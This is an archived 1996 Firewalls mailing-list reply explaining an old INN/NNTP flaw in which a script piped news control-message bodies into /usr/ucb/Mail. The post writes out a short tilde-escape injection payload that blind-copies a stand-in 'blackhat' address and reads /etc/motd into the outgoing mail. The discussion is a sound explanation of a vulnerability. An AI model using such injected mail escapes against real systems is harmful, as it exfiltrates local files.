Firewalls: Re: INN/NNTP Security Implications

Firewalls
(February 1996)

Indexed By Thread: [Previous] [Next]

Subject:	Re: INN/NNTP Security Implications
From:	nreadwin @ london . micrognosis . com (Neil Readwin)
Date:	Thu, 15 Feb 1996 22:36:53 +0000 (GMT)
To:	woods @ ncar . ucar . edu (Greg Woods)
Cc:	firewalls @ GreatCircle . COM
In-reply-to:	<199602142137 . OAA21824 @ ncar . ucar . EDU> from "Greg Woods" at Feb 14, 96 02:37:46 pm

Greg Woods writes:
> It was one of those things where a shell script did something like
> 
> /usr/ucb/Mail $address_obtained_from_news_article

It was actually

	/usr/ucb/Mail < body_of_article

which meant if someone put

	~b dude @
 blackhat .
 org
	~r /etc/motd

in the body of a control message then it would send off your message of
the day. Neil.
-- 
  E-mail: nreadwin @
 micrognosis .
 co .
 uk               BOFH-mail: nreadwin @
 dot .
 dot

References:

Re: INN/NNTP Security Implications
From: woods @ ncar . ucar . edu (Greg Woods)

Indexed By Date	Previous:	Re: MS-Windows PC as an email gateway From: "Paul D. Robertson" <proberts @ clark . net>
Indexed By Date	Next:	Re: The Secure Operating Systems Question From: Kevin Lahey <kml @ mathcs . emory . edu>
Indexed By Thread	Previous:	Re: INN/NNTP Security Implications From: woods @ ncar . ucar . edu (Greg Woods)
Indexed By Thread	Next:	Re: INN/NNTP Security Implications From: Casper . Dik @ Holland . Sun . COM (Casper Dik - ENS Network Security - Network Security Engineer)